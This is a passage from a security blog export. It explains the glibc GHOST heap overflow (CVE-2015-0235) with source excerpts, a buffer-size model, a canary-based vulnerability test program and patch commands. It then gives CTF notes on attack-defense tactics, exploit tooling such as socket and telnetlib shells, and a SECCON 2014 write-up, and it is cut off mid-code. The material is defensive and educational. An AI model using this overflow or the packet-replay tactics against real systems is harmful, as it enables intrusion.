100 char *new_buf;
101 *buffer_size = size_needed;
102 new_buf = (char *) realloc (*buffer, *buffer_size);
103
104 if (new_buf == NULL)
105 {
106 save = errno;
107 free (*buffer);
108 *buffer = NULL;
109 *buffer_size = 0;
110 __set_errno (save);
111 if (h_errnop != NULL)
112 *h_errnop = TRY_AGAIN;
113 *result = NULL;
114 goto done;
115 }
116 *buffer = new_buf;
117 }
</code></pre>
<p>Now comes the <strong>crucial</strong> part</p>
<pre><code class="language-c">121 host_addr = (host_addr_t *) *buffer;
122 h_addr_ptrs = (host_addr_list_t *)
123 ((char *) host_addr + sizeof (*host_addr));
124 h_alias_ptr = (char **) ((char *) h_addr_ptrs + sizeof (*h_addr_ptrs));
125 hostname = (char *) h_alias_ptr + sizeof (*h_alias_ptr);
</code></pre>
<p>As seen above, four different pointers are set up into the memory block of <code>buffer</code>: <code>host_addr</code>, <code>h_addr_ptrs</code>, <code>h_alias_ptr</code>, and <code>hostname</code>. Looking back at the <code>size_needed</code> computation, however, it never accounts for <code>sizeof (*h_alias_ptr)</code>, so the buffer can be overflowed by the size of one char pointer. If this is getting confusing, a couple of pictures will help:</p>
<ul>
<li><p>The picture below shows that <code>buffer</code> is a block of heap memory obtained through <code>gethostbyname*()</code>, with the four pointers each pointing at one part of it:</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjBf1PmhhAS5sylEdQZ_Va0GOcy5S0VF34j5xTt7j8KCd7xf8YH1nRbM4KT0egOxW0c5QJnYVB0S_mKddtkfYCvgr4_jurKQJ-9DFeJcWU-cW-Wo-MajnjYXAveiiW2YIdyUNJHNuycbE/s1600/ghost001.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjBf1PmhhAS5sylEdQZ_Va0GOcy5S0VF34j5xTt7j8KCd7xf8YH1nRbM4KT0egOxW0c5QJnYVB0S_mKddtkfYCvgr4_jurKQJ-9DFeJcWU-cW-Wo-MajnjYXAveiiW2YIdyUNJHNuycbE/s320/ghost001.jpg" width="320" height="153" /></a></div>
<li><p>However, <code>size_needed</code> leaves out <code>sizeof (*h_alias_ptr)</code>, so the system believes the allocated size is enough to hold everything:</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUwiYG2iXsLMjkezWQtfn8hjknIO0tBUFH78P1HUnjq-KvfgOFRoQmGeBZFrHLHLUW8Jzs7c2llEyIoX6Yk2858ZLQ936Gyo3ZcaMvk9xSQUpBuYXzpcmDwDFTA36XP3_K1ynyhi8pgMQ/s1600/ghost.002.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUwiYG2iXsLMjkezWQtfn8hjknIO0tBUFH78P1HUnjq-KvfgOFRoQmGeBZFrHLHLUW8Jzs7c2llEyIoX6Yk2858ZLQ936Gyo3ZcaMvk9xSQUpBuYXzpcmDwDFTA36XP3_K1ynyhi8pgMQ/s320/ghost.002.jpg" width="320" height="154" /></a></div>
</ul>
<p>The following line is where the overflow actually happens: it copies the contents of <code>name</code> into the memory block that <code>hostname</code> points to.</p>
<pre><code class="language-c">/* digits_dots.c, glibc 2.17, line 157 */
resbuf->h_name = strcpy (hostname, name);
</code></pre>
<p>Here is the problem. Suppose <code>size_needed</code> is exactly the preallocated maximum, 1024. The region that <code>hostname</code> points to then only has <code>sizeof(name)-sizeof(*h_alias_ptr)</code> bytes of room left, so copying <code>name</code> into <code>hostname</code> overflows, as shown below:</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWfMpjPbDwdW8nzz4rRJGtko1p_r-r4zh50WR7vd72vcdC9SGlWpQgk3MssPxWl1YSa7Y2xHonaRv1TtMc-WGjrEiuBOv8ZVC79mfrZhfE8iyGEtXAkMTHqYcAakeFQB1MYoAE9n5D9Rk/s1600/ghost003.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWfMpjPbDwdW8nzz4rRJGtko1p_r-r4zh50WR7vd72vcdC9SGlWpQgk3MssPxWl1YSa7Y2xHonaRv1TtMc-WGjrEiuBOv8ZVC79mfrZhfE8iyGEtXAkMTHqYcAakeFQB1MYoAE9n5D9Rk/s320/ghost003.jpg" width="320" height="158" /></a></div>
<p>That is the core issue of this vulnerability. Reaching this code path requires the conditions described earlier; for more detail see the <a href="https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt">vulnerability analysis released by Qualys</a>, which has a fuller explanation and tests.</p>
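<p>To make the size arithmetic concrete, the following is an added example (my own code, not the blog's and not glibc's) that models the buffer layout of <code>__nss_hostname_digits_dots()</code> using the two typedefs from <code>digits_dots.c</code>, and computes for each of the two branches above how many bytes <code>strcpy (hostname, name)</code> would write past the end of the buffer. The <code>ghost_*</code> function names are assumptions of this example.</p>

```c
#include <stddef.h>
#include <stdio.h>

/* The two helper types from glibc's nss/digits_dots.c, reproduced here so
   the arithmetic is self-contained; no glibc internals are touched. */
typedef unsigned char host_addr_t[16];   /* room for one IPv6 address */
typedef char *host_addr_list_t[2];       /* {&addr, NULL} */

/* Byte offsets of the four objects carved out of *buffer, in the order
   the vulnerable function lays them out. */
struct ghost_layout {
    size_t host_addr_off;
    size_t h_addr_ptrs_off;
    size_t h_alias_ptr_off;
    size_t hostname_off;
};

struct ghost_layout ghost_compute_layout(void)
{
    struct ghost_layout l;
    l.host_addr_off   = 0;
    l.h_addr_ptrs_off = l.host_addr_off + sizeof(host_addr_t);
    l.h_alias_ptr_off = l.h_addr_ptrs_off + sizeof(host_addr_list_t);
    l.hostname_off    = l.h_alias_ptr_off + sizeof(char *); /* the unbudgeted slot */
    return l;
}

/* size_needed exactly as glibc 2.17 computes it: the h_alias_ptr slot is missing. */
size_t ghost_size_needed_vulnerable(size_t name_len)
{
    return sizeof(host_addr_t) + sizeof(host_addr_list_t) + name_len + 1;
}

/* The same computation with the missing term put back, which is what the fix does. */
size_t ghost_size_needed_fixed(size_t name_len)
{
    return sizeof(host_addr_t) + sizeof(host_addr_list_t) + sizeof(char *) + name_len + 1;
}

/* Bytes that strcpy (hostname, name) ends up past a buffer of buf_size bytes,
   or 0 when the copy fits. The terminating NUL counts as one byte. */
static size_t ghost_past_end(size_t buf_size, size_t name_len)
{
    size_t end = ghost_compute_layout().hostname_off + name_len + 1;
    return end > buf_size ? end - buf_size : 0;
}

/* Reentrant branch (gethostbyname_r): the caller's buffer of buflen bytes is
   never grown; the check rejects the name only if size_needed > buflen. */
size_t ghost_overflow_reentrant(size_t buflen, size_t name_len)
{
    if (ghost_size_needed_vulnerable(name_len) > buflen)
        return 0;                         /* ERANGE, nothing is copied */
    return ghost_past_end(buflen, name_len);
}

/* Non-reentrant branch (gethostbyname): the static buffer of cur_size bytes
   is realloc'ed to exactly size_needed when it is too small. */
size_t ghost_overflow_nonreentrant(size_t cur_size, size_t name_len)
{
    size_t need = ghost_size_needed_vulnerable(name_len);
    size_t buf_size = cur_size < need ? need : cur_size;
    return ghost_past_end(buf_size, name_len);
}

/* Largest name length the vulnerable check still accepts for a fixed buffer;
   this is the len the PoC in the next section picks for its 1024-byte buffer. */
size_t ghost_boundary_name_len(size_t buflen)
{
    return buflen - sizeof(host_addr_t) - sizeof(host_addr_list_t) - 1;
}

int main(void)
{
    size_t buflen = 1024;
    size_t b = ghost_boundary_name_len(buflen);
    size_t len;
    printf("hostname lives at offset %zu inside buffer\n",
           ghost_compute_layout().hostname_off);
    /* walk across the boundary to see where each branch starts to overrun */
    for (len = b - 8; len <= b + 2; len++)
        printf("strlen(name)=%zu  reentrant overflow=%zu  non-reentrant overflow=%zu\n",
               len, ghost_overflow_reentrant(buflen, len),
               ghost_overflow_nonreentrant(buflen, len));
    return 0;
}
```

<p>Because the reentrant path never grows the caller's buffer, the overrun is not limited to the single boundary length the PoC uses: every <code>strlen(name)</code> from <code>buflen - hostname_off</code> up to the boundary overruns by 1 to <code>sizeof(char *)</code> bytes, while the non-reentrant path overruns by exactly <code>sizeof(char *)</code> whenever the buffer has to grow.</p>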
<h1 id="toc_5">POC</h1>
<p>This can be used to test whether a system is safe. Save the following code as <code>ghost.c</code> and run:</p>
<pre><code>$ gcc ghost.c -o ghost
$ ./ghost
# if it prints vulnerable, the system is exposed to this risk
</code></pre>
<pre><code class="language-c">#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };
int main(void) {
struct hostent resbuf;
struct hostent *result;
int herrno;
int retval;
/*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
char name[sizeof(temp.buffer)];
memset(name, '0', len);
name[len] = '\0';
retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);
if (strcmp(temp.canary, CANARY) != 0) {
puts("vulnerable");
exit(EXIT_SUCCESS);
}
if (retval == ERANGE) {
puts("not vulnerable");
exit(EXIT_SUCCESS);
}
puts("should not happen");
exit(EXIT_FAILURE);
}
</code></pre>
<h1 id="toc_6">受引響的服務</h1>
<p>Exim、clockdiff、<strong>pppd</strong> 等調用 <code>gethostbyname*()</code> 的服務
新增 <a href="http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html"><strong>wordpress</strong></a> 等 php 相關的 CMS 也有機會受影響</p>
<h1 id="toc_7"><a href="http://seclists.org/oss-sec/2015/q1/283">排除名單</a></h1>
<p>apache, cups, dovecot, gnupg, isc-dhcp, lighttpd, mariadb/mysql,
nfs-utils, nginx, nodejs, openldap, openssh, postfix, proftpd,
pure-ftpd, rsyslog, samba, sendmail, sysklogd, syslog-ng, tcp_wrappers,
vsftpd, xinetd.
雖然上述是目前應該不會有問題的,但還是建議更新一下 glibc 以防萬一</p>
<h1 id="toc_8">同場加映</h1>
<p>這幾天下來又有研究人員<a href="http://threatpost.com/php-applications-wordpress-subject-to-ghost-glibc-vulnerability/110755">發現</a>以 php 所寫的相關應用也都有機會受到影響,像是 wordpress 等等 <a href="http://zh.wikipedia.org/wiki/%E5%86%85%E5%AE%B9%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F">CMS</a> ,攻擊者有機會藉由惡意的 domain 來觸發 ghost 這個漏洞,危害極大,所以老話一句,無論如何都請更新 Glibc ,以確保伺服器的安全。</p>
<h1 id="toc_9">修補方式</h1>
<p>Debian 系列</p>
<pre><code># apt-get clean
# apt-get update
# apt-get upgrade
# reboot
</code></pre>
<p>Red Hat family</p>
<pre><code># yum clean all
# yum update
# yum install glibc*
# reboot
</code></pre>
<p>For other distributions, see <a href="http://www.cyberciti.biz/faq/cve-2015-0235-patch-ghost-on-debian-ubuntu-fedora-centos-rhel-linux/">this article</a>.</p>
<h1 id="toc_10">Reference</h1>
<p><a href="https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt">Qualys Security Advisory CVE-2015-0235</a>
<a href="http://osxr.org/glibc/source/?v=glibc-2.17">glibc Cross Reference</a>
<a href="http://www.freebuf.com/news/57729.html">Freebuf</a>
<a href="http://threatpost.com/php-applications-wordpress-subject-to-ghost-glibc-vulnerability/110755">threatpost</a></p>
<h1 id="toc_11">附註</h1>
<p>如上述內容有任何錯誤的地方歡迎留言告知</p>
</body>
Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-73858077999388759452015-01-20T20:49:00.000-08:002016-10-10T20:49:19.622-07:00CTCTF
</head>
<body>
<h1 id="toc_0">CTCTF</h1>
<p>This <a href="http://ct.ctf.tw/">CTF</a> was the final exam of NCTU's program security course and NTU's computer security course, but playing it felt exactly like a real competition rather than an exam. I took part as an auditing student, and it was also my first time in an on-site attack-defense CTF. Due to lack of experience we could only finish at the bottom, but I'll take it as experience. This time I focused far too much on solving the challenges and didn't think about patching the holes first or replaying packets, which cost us scoring chances. This kind of competition is more challenging than the usual Jeopardy format, and a lot of fun; it's a pity such competitions are few and rare. I hope to get more chances to play, and in the meantime to keep training myself, because this field is really wide.</p>
<p>Let me make a small note here, so that the next time I play this type of competition I can get up to speed faster.</p>
<ul>
<li>Before the competition
<ul>
<li>Write a script that can send packet data directly</li>
<li>Write a script that can submit keys directly</li>
<li>Write a rough exploit skeleton</li>
<li>Write wrappers ....... </li>
<li>Install all the tools</li>
<li>gdb, wireshark, tcpdump, IDA ......</li>
</ul></li>
<li>During the competition
<ul>
<li>Patch the known holes first!!!</li>
<li>Try to solve before the other teams do, although that's not easy XD</li>
<li>Have someone doing packet analysis and backups</li>
<li>Once someone has attacked successfully, immediately find the attack packet and use it to send to the other teams, so the score gap to the other teams doesn't grow too large</li>
<li>Patch the vulnerability right after analyzing it</li>
</ul></li>
<li>After the competition
<ul>
<li>Analyze the causes of major score losses</li>
<li>Analyze whether the division of labor was appropriate</li>
<li>How to handle it next time</li>
</ul></li>
</ul>
</body>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-43963289832712741412014-12-13T11:09:00.000-08:002016-10-10T11:16:47.449-07:00 CTF Notes
<body>
<h1 id="toc_1">
前言</h1>
近日來解 CTF 時,時常會用到一些工具及 python 的 module 因此先記下來作為日後參考用<br />
<h1 id="toc_2">
Python modules</h1>
<h2 id="toc_3">
socket</h2>
<ul>
<li>Description:<br />
<ul>
<li>An almost indispensable module for CTF, mainly used to create a TCP connection</li>
<li>Generally more convenient than netcat, and easier for sending payloads</li>
<li>Only the commonly used parts are listed below; for the rest see the <a href="https://docs.python.org/2/library/socket.html">official documentation</a></li>
</ul>
</li>
<li>Usage:<br />
<ul>
<li>class:
<ul>
<li>socket(family,type[,protocol])</li>
</ul>
</li>
<li>family:
<ul>
<li>socket.AF_INET (IPv4)</li>
<li>socket.AF_INET6 (IPv6)</li>
</ul>
</li>
<li>type:
<ul>
<li>socket.SOCK_STREAM (TCP)</li>
<li>socket.SOCK_DGRAM (UDP)</li>
</ul>
</li>
<li>Examples:<br />
<ul>
<li>Create a TCP socket:<br />
<pre><code>sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
</code></pre>
</li>
<li>Create a UDP socket:<br />
<pre><code>sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
</code></pre>
</li>
</ul>
</li>
<li>Functions:<br />
<ul>
<li>sock.connect((host,port))
<ul>
<li>Establish a connection to host:port</li>
</ul>
</li>
<li>sock.recv(buffersize)
<ul>
<li>Receive data sent over the socket, at most buffersize bytes</li>
</ul>
</li>
<li>sock.send(string)
<ul>
<li>Send data</li>
</ul>
</li>
<li>sock.close()
<ul>
<li>Close the socket</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="toc_4">
struct</h2>
<ul>
<li>Description:<br />
<ul>
<li>Used to output numeric values in binary form (e.g. \x54\x01\x05\x08); it was originally meant for reading C data and converting it into values Python understands. See the <a href="http://docs.python.org/library/struct.html">official documentation</a> for details</li>
<li>Very handy when building payloads</li>
<li>You can specify little-endian or big-endian</li>
</ul>
</li>
<li>Usage:<br />
<ul>
<li>Format:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHHZiu2s50biUo912CDlMut5zUWI98twYW5m1Mwj7iYtd2tgDg0xonqxktKSnwa-S-rC9LSO5FIyKmLAAEm3I5BwLcwQTsnr9EsHzaM23lzdefH4a7rjDlmqVY4LS6E1mZbe_CVcwVbBQ/s1600/note1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHHZiu2s50biUo912CDlMut5zUWI98twYW5m1Mwj7iYtd2tgDg0xonqxktKSnwa-S-rC9LSO5FIyKmLAAEm3I5BwLcwQTsnr9EsHzaM23lzdefH4a7rjDlmqVY4LS6E1mZbe_CVcwVbBQ/s320/note1.png" width="320" height="207" /></a></div>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjuDSAHqhSJ-qE2GaiPI25EWLAEpC8pqxfWgQvtNXJdBF1hAlpt_IA81d9Q9mp-R9q97pvTuHoH2-nzSlS3vUEGTPg29oPdo5roH5GlWgI7I_XOkkwGpwTFLhrifb8ykbjunlUEDyNn5A/s1600/note2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjuDSAHqhSJ-qE2GaiPI25EWLAEpC8pqxfWgQvtNXJdBF1hAlpt_IA81d9Q9mp-R9q97pvTuHoH2-nzSlS3vUEGTPg29oPdo5roH5GlWgI7I_XOkkwGpwTFLhrifb8ykbjunlUEDyNn5A/s320/note2.png" width="320" height="93" /></a></div>
<li>Functions:</li>
<li>struct.pack(fmt,v1,v2,...)<br />
<ul>
<li>fmt is the format described above, i.e. the layout of the string to output; a byte order may be prepended</li>
<li>Ex :<br />
<pre><code>struct.pack("<I",0x8048580) # \x80\x85\x04\x08
</code></pre>
</li>
</ul>
</li>
<li>struct.unpack(fmt,string)<br />
<ul>
<li>fmt is the format described above; pass in the binary string to get the original value back</li>
<li>Ex :<br />
<pre><code>struct.unpack("<I","\x80\x85\x04\x08") # (134514048,) = 0x8048580
</code></pre>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="toc_5">
telnetlib</h2>
<ul>
<li>Description:<br />
<ul>
<li>I've been using this for a long time; back when I was a network admin I often used it to manage all kinds of devices. I stopped later, since its security is a problem, but for a plain telnet connection it's a very convenient module. See the <a href="https://docs.python.org/2/library/telnetlib.html">official documentation</a> for details</li>
<li>Combined with socket, it's a very common technique in CTF: once a shell has been started on the remote side, it's what keeps the connection interactive</li>
</ul>
</li>
<li>Usage:<br />
<ul>
<li>class
<ul>
<li>telnetlib.Telnet([host[, port[, timeout]]]) # create a telnet object connected to host</li>
</ul>
</li>
<li>Functions:
<ul>
<li>Telnet.read_until(string)
<ul>
<li>Read data sent by the host until string is seen</li>
</ul>
</li>
<li>Telnet.write(buffer)
<ul>
<li>Send the contents of buffer to the host</li>
</ul>
</li>
<li>Telnet.interact()
<ul>
<li>Hand control of the telnet session over to the user, so the connection behaves like an interactive remote command session</li>
</ul>
</li>
<li>Telnet.close()
<ul>
<li>Close the telnet connection</li>
</ul>
</li>
</ul>
</li>
<li>Example:<br />
<pre><code>telnet = telnetlib.Telnet()
telnet.sock = sock # sock is a socket object
telnet.interact()
</code></pre>
</li>
</ul>
</li>
</ul>
<h1 id="toc_6">
Tool</h1>
<ul>
<li><a href="http://tk-blog.blogspot.tw/search/label/checksec.sh">checksec.sh</a><br />
<ul>
<li>Checks which protections a Linux executable was built with</li>
</ul>
</li>
<li><a href="http://portswigger.net/burp/">BurpSuite</a><br />
<ul>
<li>Sets up a local proxy to intercept and modify outgoing HTTP requests</li>
</ul>
</li>
<li><a href="http://moztw.org/">Firefox</a> 套件<br />
<ul>
<li><a href="https://addons.mozilla.org/zh-tw/firefox/addon/hackbar/">Hackbar</a></li>
<li><a href="https://addons.mozilla.org/zh-tw/firefox/addon/cookies-manager-plus/">Cookies Manager</a></li>
<li><a href="https://addons.mozilla.org/zh-tw/firefox/addon/web-developer/">Web Developer</a></li>
<li><a href="https://addons.mozilla.org/zh-tw/firefox/addon/tamper-data/">Temper Data</a></li>
<li><a href="https://addons.mozilla.org/zh-tw/firefox/addon/modify-headers/">Modify Header</a></li>
</ul>
</li>
<li><a href="http://sqlmap.org/">sqlmap</a><br />
<ul>
<li>Detects whether a website has SQL injection vulnerabilities</li>
<li><strong>Do not use it casually, or you may well end up with legal problems</strong></li>
</ul>
</li>
<li>Debugger<br />
<ul>
<li><a href="http://www.gnu.org/software/gdb/">Gdb</a>
<ul>
<li>A very powerful debugger on Linux; I'll write a tutorial some day when I have time</li>
</ul>
</li>
<li><a href="https://www.hex-rays.com/products/ida/">IDA Pro</a>
<ul>
<li>A very powerful static analysis tool on Windows</li>
</ul>
</li>
<li><a href="http://debugger.immunityinc.com/">Immunity debugger</a>
<ul>
<li>Also a powerful debugger on Windows</li>
</ul>
</li>
</ul>
</li>
</ul>
</body>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-1821692518792792102014-12-08T11:00:00.000-08:002016-10-10T11:12:56.595-07:00SECCON 2014 CTF Write-up
<body>
<h2 id="toc_0">
Introduction</h2>
This was the first time I tried a foreign CTF. In the two days I only solved some of the 100-point challenges; it overlapped with the HITCON Girls event, so there was not much time to work on it. These are the challenges I solved:<br />
<ul>
<li>Easy Cipher (Crypto)</li>
<li>Shuffle (Binary)</li>
<li>Get the key.txt (Forensics)</li>
<li>Choose the number (Programming)</li>
<li>Get the key (Network)</li>
</ul>
<h2 id="toc_1">
Easy Cipher</h2>
<ul>
<li>Challenge: decode the following message<br />
<pre><code>87 101 108 1100011 0157 6d 0145 040 116 0157 100000 0164 104 1100101 32 0123 69 67 0103 1001111 1001110 040 062 060 49 064 100000 0157 110 6c 0151 1101110 101 040 0103 1010100 70 101110 0124 1101000 101 100000 1010011 1000101 67 0103 4f 4e 100000 105 1110011 040 116 1101000 0145 040 1100010 0151 103 103 0145 1110011 0164 100000 1101000 0141 99 6b 1100101 0162 32 0143 111 1101110 1110100 101 0163 0164 040 0151 0156 040 74 0141 1110000 1100001 0156 056 4f 0157 0160 115 44 040 0171 1101111 117 100000 1110111 0141 0156 1110100 32 0164 6f 32 6b 1101110 1101111 1110111 100000 0164 1101000 0145 040 0146 6c 97 1100111 2c 100000 0144 111 110 100111 116 100000 1111001 6f 117 63 0110 1100101 0162 0145 100000 1111001 111 117 100000 97 114 0145 46 1010011 0105 0103 67 79 1001110 123 87 110011 110001 67 110000 1001101 32 55 060 100000 110111 0110 110011 32 53 51 0103 0103 060 0116 040 5a 0117 73 0101 7d 1001000 0141 1110110 1100101 100000 102 0165 0156 33
</code></pre>
</li>
<li>Approach:<br />
<ul>
<li>The text is clearly made up of numbers written in four different bases, so each token has to be assigned to its base before it is converted to an ASCII character. At first I could not see any rule and kept misclassifying tokens, but on closer inspection each base has a distinguishing feature:
<ul>
<li>Binary: token length >= 6</li>
<li>Octal: token starts with 0</li>
<li>Hexadecimal: contains a letter</li>
<li>Decimal: everything else</li>
</ul>
The checks have to be applied in that order. A short leading-zero token such as 0110 is octal (72, 'H'), not binary: every printable ASCII code needs at least six binary digits, so a binary token is never shorter than that.
</li>
</ul>
</li>
<li>Solution:<br />
<ul>
<li>With the features above, a short Python script decodes the whole message</li>
<li><a href="http://pastebin.com/z5ZZ624s">crypt.py</a></li>
</ul>
</li>
<li>Result:<br />
<pre><code>Welcome to the SECCON 2014 online CTF.The SECCON is the biggest hacker contest in Japan.Oops, you want to know the flag, don't you?Here you are.SECCON{W31C0M 70 7H3 53CC0N ZOIA}Have fun!
</code></pre>
</li>
</ul>
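A decoder that applies the four classification rules above, added here as an example; it is not the crypt.py linked from the post. The challenge text is embedded as a constant so it runs offline. One caveat the rules hide: they only work because every hexadecimal token in this message happens to contain a letter. A hex token such as 44 would be classified as decimal, so the decoder refuses any token that does not map to printable ASCII instead of silently emitting garbage.

```python
import re

# Copy of the challenge text from the write-up, embedded so the example runs offline.
CIPHERTEXT = (
    "87 101 108 1100011 0157 6d 0145 040 116 0157 100000 0164 104 1100101 32 "
    "0123 69 67 0103 1001111 1001110 040 062 060 49 064 100000 0157 110 6c 0151 "
    "1101110 101 040 0103 1010100 70 101110 0124 1101000 101 100000 1010011 1000101 "
    "67 0103 4f 4e 100000 105 1110011 040 116 1101000 0145 040 1100010 0151 103 103 "
    "0145 1110011 0164 100000 1101000 0141 99 6b 1100101 0162 32 0143 111 1101110 "
    "1110100 101 0163 0164 040 0151 0156 040 74 0141 1110000 1100001 0156 056 4f "
    "0157 0160 115 44 040 0171 1101111 117 100000 1110111 0141 0156 1110100 32 0164 "
    "6f 32 6b 1101110 1101111 1110111 100000 0164 1101000 0145 040 0146 6c 97 1100111 "
    "2c 100000 0144 111 110 100111 116 100000 1111001 6f 117 63 0110 1100101 0162 "
    "0145 100000 1111001 111 117 100000 97 114 0145 46 1010011 0105 0103 67 79 "
    "1001110 123 87 110011 110001 67 110000 1001101 32 55 060 100000 110111 0110 "
    "110011 32 53 51 0103 0103 060 0116 040 5a 0117 73 0101 7d 1001000 0141 1110110 "
    "1100101 100000 102 0165 0156 33"
)


def base_of(token: str) -> int:
    """Classify one token by the features noted in the write-up.

    Order matters: the binary test runs before the octal one, so a short
    leading-zero token such as 0110 is read as octal (72, 'H'). Every printable
    ASCII code needs at least six binary digits, so no binary token is shorter.
    """
    if any(c in "abcdefABCDEF" for c in token):
        return 16
    if len(token) >= 6 and set(token) <= {"0", "1"}:
        return 2
    if token.startswith("0"):
        return 8
    return 10


def decode(text: str) -> str:
    """Turn the whitespace-separated tokens into plaintext, failing loudly on any
    token that does not map to printable ASCII (the symptom of a misclassified
    base) rather than emitting garbage."""
    out = []
    for token in text.split():
        base = base_of(token)
        try:
            value = int(token, base)
        except ValueError as exc:
            raise ValueError(f"{token!r} is not a base-{base} number") from exc
        if not 32 <= value <= 126:
            raise ValueError(f"{token!r} (base {base}) gives {value}, not printable ASCII")
        out.append(chr(value))
    return "".join(out)


FLAG_RE = re.compile(r"SECCON\{[^}]*\}")


def extract_flag(plaintext: str):
    """Pull the SECCON{...} flag out of the decoded message, or None if absent."""
    match = FLAG_RE.search(plaintext)
    return match.group(0) if match else None


if __name__ == "__main__":
    message = decode(CIPHERTEXT)
    print(message)
    print(extract_flag(message))
```

Run it as a script to print the decoded message and the flag; for a different cipher of the same style, swap the constant and, if its hex tokens may be all-digit, replace the letter test in base_of with something stronger (a fixed width, for example).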
<h2 id="toc_2">
Shuffle</h2>
<ul>
<li>Challenge:<br />
<ul>
<li>Find the string before randomizing.</li>
<li><a href="http://files.quals.seccon.jp/shuffle">Shuffle</a></li>
</ul>
</li>
<li>Approach:<br />
<ul>
<li>For a binary challenge this one is relatively easy. The binary keeps shuffling the flag with random(), and the task is to recover the flag as it was before the shuffle. In gdb, set a breakpoint right before the call to random() and dump the string from the stack.</li>
</ul>
</li>
<li>Solution:<br />
<ul>
<li>gdb ./shuffle</li>
<li>disas main</li>
<li>b *(address of call random)</li>
<li>r</li>
<li>x/15s $esp</li>
<li>The flag appears among the dumped strings</li>
</ul>
</li>
<li>Answer: SECCON{Welcome to the SECCON 2014 CTF!}</li>
</ul>
<h2 id="toc_3">
Get the key.txt</h2>
<ul>
<li>Challenge:
<ul>
<li><a href="http://files.quals.seccon.jp/forensic100.zip">forensic100.zip</a></li>
</ul>
</li>
<li>Approach:<br />
<ul>
<li>The challenge gives nothing but a zip archive. Unzipping it leaves a file of no obvious type; running file on it unexpectedly reports Linux rev 1.0 ext2 filesystem data. After loop-mounting it, the image turns out to hold many files whose names are plain numbers. Running strings over a few of them shows names like keyxx.txt inside, and since the challenge is called Get the key.txt, the flag must be in the one that contains key.txt.</li>
</ul>
</li>
<li>Solution:<br />
<ul>
<li>unzip forensic100.zip</li>
<li>file forensic100<br />
<pre><code>forensic100: Linux rev 1.0 ext2 filesystem data (mounted or unclean), UUID=0b92a753-7ec9-4b20-8c0b-79c1fa140869
</code></pre>
</li>
<li>mount -o loop forensic100 /mnt/</li>
<li>cd /mnt/</li>
<li>for file in * ; do echo $file && strings $file; done;</li>
<li>File 1 turns out to contain key.txt</li>
<li>Extract it to get the flag</li>
</ul>
</li>
<li>Answer:<br />
<ul>
<li>SECCON{@]NL7n+-s75FrET]vU=7Z}</li>
</ul>
</li>
</ul>
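An added example (not from the post) of the two checks the solution relies on: what file(1) actually tests before calling the blob an ext2 image, and a search that goes one step further than strings, opening each numbered file as an archive and pulling out the member named exactly key.txt. That the numbered files are zip archives is my assumption, based on the post decompressing file 1 to get the flag; the directory it searches is constructed in a temporary folder, and the mount step is not repeated because it needs root.

```python
import os
import struct
import tempfile
import zipfile

# ext2/3/4 superblock: 1 KiB into the image, s_magic (0xEF53) at byte 56 of it.
SUPERBLOCK_OFFSET = 1024
MAGIC_OFFSET = SUPERBLOCK_OFFSET + 56
EXT2_SUPER_MAGIC = 0xEF53


def looks_like_ext2(image: bytes) -> bool:
    """The magic check behind file(1)'s 'ext2 filesystem data' verdict. The magic
    is shared by ext3 and ext4; file(1) reads the feature flags to tell them apart."""
    if len(image) < MAGIC_OFFSET + 2:
        return False
    (magic,) = struct.unpack_from("<H", image, MAGIC_OFFSET)
    return magic == EXT2_SUPER_MAGIC


def fake_ext2_image() -> bytes:
    """Constructed stand-in for forensic100: zeros with only the magic set."""
    image = bytearray(4096)
    struct.pack_into("<H", image, MAGIC_OFFSET, EXT2_SUPER_MAGIC)
    return bytes(image)


def find_member(root: str, target: str = "key.txt"):
    """Walk every regular file under root (the mount point), open those that are
    zip archives and return (path, member bytes) for each member whose name is
    exactly target. Matching the basename exactly avoids the decoys: a substring
    search for 'key.txt' would also hit 'mykey.txt' or 'key.txt.bak'."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            if not zipfile.is_zipfile(path):
                continue
            with zipfile.ZipFile(path) as archive:
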